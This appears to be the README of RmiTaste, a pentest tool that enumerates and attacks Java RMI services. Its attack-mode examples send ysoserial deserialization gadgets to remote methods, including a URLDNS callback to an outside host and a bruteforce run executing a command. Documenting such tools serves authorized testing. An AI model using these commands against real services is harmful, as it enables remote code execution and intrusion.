RmiTaste: detect, enumerate, interact and attack RMI services

RmiTaste

RmiTaste

RmiTaste allows security professionals to detect, enumerate, interact, and attack RMI services by calling remote methods with gadgets from ysoserial. It also allows calling remote methods with specific parameters.

Disclaimer

RmiTaste was written to aid security professionals in identifying insecure RMI services on systems that the user has prior permission to attack. Unauthorized access to computer systems is illegal and it must be used in accordance with all relevant laws. Failure to do so could lead to you being prosecuted. The developers of RmiTaste assume no liability and are not responsible for any misuse or damage caused by this program.

Usage

RmiTaste has 4 modes: conn, enum, attack, and call. Each mode has a separate help.

java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste -h

(...)
Usage: <main class> [-h] [COMMAND]
-h, --help display this help message
Commands:
conn check connection to host
enum enumerate RMI service
attack attack RMI registry methods
call call specific method on RMI remote object

 

conn mode

Conn mode allows checking if the port is an RMI service port.

# Check if 127.0.0.1:1099 is RMI Service

java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste conn -t 127.0.0.1 -p 1099

 

enum mode

Enum mode allows fetching information about RMI service such as remote objects names and classes names that remote object implements or extends. If the interface implemented by a remote object is available in RmiTaste classpath then RmiTaste will print all remote methods that you can call on this remote object.

# RMI service enumeration

java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste enum -t 127.0.0.1 -p 1099

 

attack mode

Attack mode allows calling a remote method with a specific gadget chains from ysoserial. Assume that the remote object has the following methods:

acc1 [object] [127.0.1.1:38293] 

implements java.rmi.Remote [interface]
extends java.lang.reflect.Proxy [class]
implements m0.rmitaste.example.server.ClientAccount [interface]
setPin(java.lang.String param0); [method]
Parameters: param0; may be vulnerable to Java Deserialization! [info]
getBalance(); [method]
deposit(java.lang.Object param0); [method]
Parameters: param0; may be vulnerable to Java Deserialization! [info]
withdraw(float param0); [method]

 

# Call all remote methods with URLDNS gadget as parameter

java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste attack -t 127.0.0.1 -p 1099 -g "URLDNS" -c "http://rce.mzero.pl"

 

# Call acc1:m0.rmitaste.example.server.ClientAccount:deposit method with URLDNS gadget as parameter

java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste attack -t 127.0.0.1 -p 1099 -m "acc1:m0.rmitaste.example.server.ClientAccount:deposit" -g "URLDNS" -c "http://rce.mzero.pl"

 

Option “-gen bruteforce” allows to brute force remote method with gadgets from ysoserial. In this example, deposit method will be called multiple times with gadgets from ysoserial.

# Call acc1:m0.rmitaste.example.server.ClientAccount:deposit method with gadgets from ysoserial and command ping 127.0.0.1

java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste attack -t 127.0.0.1 -p 1099 -m "acc1:m0.rmitaste.example.server.ClientAccount:deposit" -gen bruteforce -c "ping 127.0.0.1"

 

call mode

Call mode allows calling a specific method on RMI remote objects. Assume that the remote object has the following methods:

acc1 [object] [127.0.1.1:38293] 

implements java.rmi.Remote [interface]
extends java.lang.reflect.Proxy [class]
implements m0.rmitaste.example.server.ClientAccount [interface]
setPin(java.lang.String param0); [method]
Parameters: param0; may be vulnerable to Java Deserialization! [info]
getBalance(); [method]
deposit(java.lang.Object param0); [method]
Parameters: param0; may be vulnerable to Java Deserialization! [info]
withdraw(float param0); [method]

 

# Call m0.rmitaste.example.server.ClientAccount.getBalance method on acc1 remote object

java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste call -t 127.0.0.1 -p 1099 -m "acc1:m0.rmitaste.example.server.ClientAccount:getBalance"

 

# Call m0.rmitaste.example.server.ClientAccount.setPin("1234") method on acc1 remote object

java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste call -t 127.0.0.1 -p 1099 -m "acc1:m0.rmitaste.example.server.ClientAccount:setPin" -mp "string=1234"

 

Download

Copyright (c) 2020 STM Solutions